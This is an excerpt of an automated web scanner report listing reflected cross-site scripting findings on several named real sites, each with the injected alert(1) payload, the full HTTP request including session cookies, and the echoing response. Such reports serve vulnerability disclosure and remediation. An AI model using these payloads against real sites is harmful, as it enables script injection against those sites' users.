Cache-control: private


<script language="javascript">
alert("The information you have entered is not valid. Please try again.");
history.go(-1);
</script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
...[SNIP]...
<SCRIPT TYPE="text/javascript">
//-------------------------------------------------------------------------
function Check_Step1()
{
   var chk = "N"
   //if ('BIZDIR2e262
alert(1)//f836dc6f2af
' != 'BOSWTS')
   //{
       //document.ListingType.LTypeId.checked = true;
       //return true
   //}

   for (i = 0; i < document.ListingType.LTypeId.length; i ++) {
       if (document.ListingType.LTypeId[i].che
...[SNIP]...

4.340. https://pro.vembu.com/account.php [error parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://pro.vembu.com
Path:   /account.php

Issue detail

The value of the error request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5cdbe</script><script>alert(1)</script>0a59ab8a45 was submitted in the error parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account.php?page=login&error=5cdbe</script><script>alert(1)</script>0a59ab8a45 HTTP/1.1
Host: pro.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57288555.1289802359.1.1.utmcsr=vembu.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=57288555.332453333.1289802359.1289802359.1289802359.1; __utmc=57288555; __utmb=57288555.1.10.1289802359; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 06:31:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="google-site-ve
...[SNIP]...
display","none");
//$("#message").css("display","block");
// $("#message_container").css("position","static");
//$("#message").css("width","979px");

showMessage(0,true,"5cdbe</script><script>alert(1)</script>0a59ab8a45","","");
});

$(document).ready(function() {
showLogin();
var ua=navigator.userAgent.toLowerCase();
if(!((ua.indexOf('konqueror')!=-1) && /khtml\/3\.[0-4]/.test(u
...[SNIP]...

4.341. https://pro.vembu.com/account.php [header parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://pro.vembu.com
Path:   /account.php

Issue detail

The value of the header request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7f7e</script><script>alert(1)</script>e6c159faab was submitted in the header parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account.php?page=login&error=Please%20enter%20your%20Account%20ID%20and%20password%20before%20you%20click%20on%20the%20Login%20button.&header=Hold%20on!%20You%20clicked%20Login%20too%20fast!c7f7e</script><script>alert(1)</script>e6c159faab HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Encoding: gzip, deflate
Cookie: vhbsc=3vkq98e8n43m6gnh0u2qf9sff6; __utma=57288555.332453333.1289802359.1289802359.1289802359.1; __utmb=57288555.2.10.1289802359; __utmc=57288555; __utmz=57288555.1289802359.1.1.utmcsr=vembu.com|utmccn=(referral)|utmcmd=referral|utmcct=/
Host: pro.vembu.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 06:33:40 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="google-site-ve
...[SNIP]...
atic");
//$("#message").css("width","979px");

showMessage(0,true,"Please enter your Account ID and password before you click on the Login button.","Hold on! You clicked Login too fast!c7f7e</script><script>alert(1)</script>e6c159faab","");
});

$(document).ready(function() {
showLogin();
var ua=navigator.userAgent.toLowerCase();
if(!((ua.indexOf('konqueror')!=-1) && /khtml\/3\.[0-4]/.test(ua))
...[SNIP]...

4.342. https://pro.vembu.com/account.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://pro.vembu.com
Path:   /account.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d191f</script><script>alert(1)</script>fd4127f72cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account.php?page=login&error=Please%20enter%20your%20Account%20ID%20and%20password%20before%20you%20click%20on%20the%20Login%20button.&header=Hold%20on!%20You%20clicked%20Login%20too%20f/d191f</script><script>alert(1)</script>fd4127f72ccast! HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Encoding: gzip, deflate
Cookie: vhbsc=3vkq98e8n43m6gnh0u2qf9sff6; __utma=57288555.332453333.1289802359.1289802359.1289802359.1; __utmb=57288555.2.10.1289802359; __utmc=57288555; __utmz=57288555.1289802359.1.1.utmcsr=vembu.com|utmccn=(referral)|utmcmd=referral|utmcct=/
Host: pro.vembu.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 06:34:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="google-site-ve
...[SNIP]...
"static");
//$("#message").css("width","979px");

showMessage(0,true,"Please enter your Account ID and password before you click on the Login button.","Hold on! You clicked Login too f/d191f</script><script>alert(1)</script>fd4127f72ccast!","");
});

$(document).ready(function() {
showLogin();
var ua=navigator.userAgent.toLowerCase();
if(!((ua.indexOf('konqueror')!=-1) && /khtml\/3\.[0-4]/.test(
...[SNIP]...

4.343. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seamframework.org
Path:   /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d66de<script>alert(1)</script>e5d2d2470cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a4j/g/3_3_3.CR1orgd66de<script>alert(1)</script>e5d2d2470cc/richfaces/renderkit/html/scripts/skinning.js HTTP/1.1
Accept: */*
Referer: http://seamframework.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: seamframework.org
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=2AB532BBD9C283F2076B76804B81733E

Response

HTTP/1.1 500
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Nov 2010 14:00:44 GMT
Connection: close
Content-Length: 7402


<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=UTF-8" />
<title>Generic error message</title>
</head>
<body>
<style>
body {
   font-family : arial, verdana, Geneva, Arial
...[SNIP]...
<span class="errorMessage">Resource not registered : orgd66de<script>alert(1)</script>e5d2d2470cc/richfaces/renderkit/html/scripts/skinning.js</span>
...[SNIP]...

4.344. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seamframework.org
Path:   /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d7f5<script>alert(1)</script>28829d3403a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a4j/g/3_3_3.CR1org/richfaces7d7f5<script>alert(1)</script>28829d3403a/renderkit/html/scripts/skinning.js HTTP/1.1
Accept: */*
Referer: http://seamframework.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: seamframework.org
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=2AB532BBD9C283F2076B76804B81733E

Response

HTTP/1.1 500
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Nov 2010 14:00:46 GMT
Connection: close
Content-Length: 7402


<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=UTF-8" />
<title>Generic error message</title>
</head>
<body>
<style>
body {
   font-family : arial, verdana, Geneva, Arial
...[SNIP]...
<span class="errorMessage">Resource not registered : org/richfaces7d7f5<script>alert(1)</script>28829d3403a/renderkit/html/scripts/skinning.js</span>
...[SNIP]...

4.345. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seamframework.org
Path:   /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload dbbb8<script>alert(1)</script>49e8f8c001b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a4j/g/3_3_3.CR1org/richfaces/renderkitdbbb8<script>alert(1)</script>49e8f8c001b/html/scripts/skinning.js HTTP/1.1
Accept: */*
Referer: http://seamframework.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: seamframework.org
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=2AB532BBD9C283F2076B76804B81733E

Response

HTTP/1.1 500
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Nov 2010 14:00:46 GMT
Connection: close
Content-Length: 7402


<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=UTF-8" />
<title>Generic error message</title>
</head>
<body>
<style>
body {
   font-family : arial, verdana, Geneva, Arial
...[SNIP]...
<span class="errorMessage">Resource not registered : org/richfaces/renderkitdbbb8<script>alert(1)</script>49e8f8c001b/html/scripts/skinning.js</span>
...[SNIP]...

4.346. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seamframework.org
Path:   /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8ca40<script>alert(1)</script>60e7c69f7e7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a4j/g/3_3_3.CR1org/richfaces/renderkit/html8ca40<script>alert(1)</script>60e7c69f7e7/scripts/skinning.js HTTP/1.1
Accept: */*
Referer: http://seamframework.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: seamframework.org
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=2AB532BBD9C283F2076B76804B81733E

Response

HTTP/1.1 500
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Nov 2010 14:00:47 GMT
Connection: close
Content-Length: 7402


<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=UTF-8" />
<title>Generic error message</title>
</head>
<body>
<style>
body {
   font-family : arial, verdana, Geneva, Arial
...[SNIP]...
<span class="errorMessage">Resource not registered : org/richfaces/renderkit/html8ca40<script>alert(1)</script>60e7c69f7e7/scripts/skinning.js</span>
...[SNIP]...

4.347. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seamframework.org
Path:   /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b0004<script>alert(1)</script>ba13d584d3c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scriptsb0004<script>alert(1)</script>ba13d584d3c/skinning.js HTTP/1.1
Accept: */*
Referer: http://seamframework.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: seamframework.org
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=2AB532BBD9C283F2076B76804B81733E

Response

HTTP/1.1 500
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Nov 2010 14:00:48 GMT
Connection: close
Content-Length: 7402


<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=UTF-8" />
<title>Generic error message</title>
</head>
<body>
<style>
body {
   font-family : arial, verdana, Geneva, Arial
...[SNIP]...
<span class="errorMessage">Resource not registered : org/richfaces/renderkit/html/scriptsb0004<script>alert(1)</script>ba13d584d3c/skinning.js</span>
...[SNIP]...

4.348. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seamframework.org
Path:   /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload aa62d<script>alert(1)</script>8e1dd0f99f4 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.jsaa62d<script>alert(1)</script>8e1dd0f99f4 HTTP/1.1
Accept: */*
Referer: http://seamframework.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: seamframework.org
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=2AB532BBD9C283F2076B76804B81733E

Response

HTTP/1.1 500
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Nov 2010 14:00:48 GMT
Connection: close
Content-Length: 7402


<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=UTF-8" />
<title>Generic error message</title>
</head>
<body>
<style>
body {
   font-family : arial, verdana, Geneva, Arial
...[SNIP]...
<span class="errorMessage">Resource not registered : org/richfaces/renderkit/html/scripts/skinning.jsaa62d<script>alert(1)</script>8e1dd0f99f4</span>
...[SNIP]...

4.349. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sfwk.org
Path:   /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d4a1f<script>alert(1)</script>19d8a7baa09 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a4j/g/3_3_3.CR1orgd4a1f<script>alert(1)</script>19d8a7baa09/richfaces/renderkit/html/scripts/skinning.js HTTP/1.1
Accept: */*
Referer: http://sfwk.org/Seam3/JMSModule
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: sfwk.org
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=16AB6D67F6C55E24BAFDCCA0850F468F

Response

HTTP/1.1 500
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Nov 2010 14:00:37 GMT
Connection: close
Content-Length: 7402


<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=UTF-8" />
<title>Generic error message</title>
</head>
<body>
<style>
body {
   font-family : arial, verdana, Geneva, Arial
...[SNIP]...
<span class="errorMessage">Resource not registered : orgd4a1f<script>alert(1)</script>19d8a7baa09/richfaces/renderkit/html/scripts/skinning.js</span>
...[SNIP]...

4.350. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sfwk.org
Path:   /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1ad36<script>alert(1)</script>571fca2968b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a4j/g/3_3_3.CR1org/richfaces1ad36<script>alert(1)</script>571fca2968b/renderkit/html/scripts/skinning.js HTTP/1.1
Accept: */*
Referer: http://sfwk.org/Seam3/JMSModule
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: sfwk.org
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=16AB6D67F6C55E24BAFDCCA0850F468F

Response

HTTP/1.1 500
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Nov 2010 14:00:38 GMT
Connection: close
Content-Length: 7402


<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=UTF-8" />
<title>Generic error message</title>
</head>
<body>
<style>
body {
   font-family : arial, verdana, Geneva, Arial
...[SNIP]...
<span class="errorMessage">Resource not registered : org/richfaces1ad36<script>alert(1)</script>571fca2968b/renderkit/html/scripts/skinning.js</span>
...[SNIP]...

4.351. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sfwk.org
Path:   /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1e12a<script>alert(1)</script>0a5dca4257b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a4j/g/3_3_3.CR1org/richfaces/renderkit1e12a<script>alert(1)</script>0a5dca4257b/html/scripts/skinning.js HTTP/1.1
Accept: */*
Referer: http://sfwk.org/Seam3/JMSModule
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: sfwk.org
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=16AB6D67F6C55E24BAFDCCA0850F468F

Response

HTTP/1.1 500
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Nov 2010 14:00:38 GMT
Connection: close
Content-Length: 7402


<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=UTF-8" />
<title>Generic error message</title>
</head>
<body>
<style>
body {
   font-family : arial, verdana, Geneva, Arial
...[SNIP]...
<span class="errorMessage">Resource not registered : org/richfaces/renderkit1e12a<script>alert(1)</script>0a5dca4257b/html/scripts/skinning.js</span>
...[SNIP]...

4.352. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sfwk.org
Path:   /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 44e40<script>alert(1)</script>c7b56606aff was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a4j/g/3_3_3.CR1org/richfaces/renderkit/html44e40<script>alert(1)</script>c7b56606aff/scripts/skinning.js HTTP/1.1
Accept: */*
Referer: http://sfwk.org/Seam3/JMSModule
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: sfwk.org
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=16AB6D67F6C55E24BAFDCCA0850F468F

Response

HTTP/1.1 500
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Nov 2010 14:00:38 GMT
Connection: close
Content-Length: 7402


<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=UTF-8" />
<title>Generic error message</title>
</head>
<body>
<style>
body {
   font-family : arial, verdana, Geneva, Arial
...[SNIP]...
<span class="errorMessage">Resource not registered : org/richfaces/renderkit/html44e40<script>alert(1)</script>c7b56606aff/scripts/skinning.js</span>
...[SNIP]...

4.353. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sfwk.org
Path:   /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4ffe2<script>alert(1)</script>549643decac was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts4ffe2<script>alert(1)</script>549643decac/skinning.js HTTP/1.1
Accept: */*
Referer: http://sfwk.org/Seam3/JMSModule
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: sfwk.org
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=16AB6D67F6C55E24BAFDCCA0850F468F

Response

HTTP/1.1 500
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Nov 2010 14:00:38 GMT
Connection: close
Content-Length: 7402


<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=UTF-8" />
<title>Generic error message</title>
</head>
<body>
<style>
body {
   font-family : arial, verdana, Geneva, Arial
...[SNIP]...
<span class="errorMessage">Resource not registered : org/richfaces/renderkit/html/scripts4ffe2<script>alert(1)</script>549643decac/skinning.js</span>
...[SNIP]...

4.354. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sfwk.org
Path:   /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload bc486<script>alert(1)</script>b51a4a9e23f was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.jsbc486<script>alert(1)</script>b51a4a9e23f HTTP/1.1
Accept: */*
Referer: http://sfwk.org/Seam3/JMSModule
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: sfwk.org
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=16AB6D67F6C55E24BAFDCCA0850F468F

Response

HTTP/1.1 500
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Nov 2010 14:00:39 GMT
Connection: close
Content-Length: 7402


<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=UTF-8" />
<title>Generic error message</title>
</head>
<body>
<style>
body {
   font-family : arial, verdana, Geneva, Arial
...[SNIP]...
<span class="errorMessage">Resource not registered : org/richfaces/renderkit/html/scripts/skinning.jsbc486<script>alert(1)</script>b51a4a9e23f</span>
...[SNIP]...

4.355. http://storegrid.vembu.com/404.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /404.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a4b"><script>alert(1)</script>f9712fdac3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /404.php?62a4b"><script>alert(1)</script>f9712fdac3c=1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: storegrid.vembu.com
Proxy-Connection: Keep-Alive
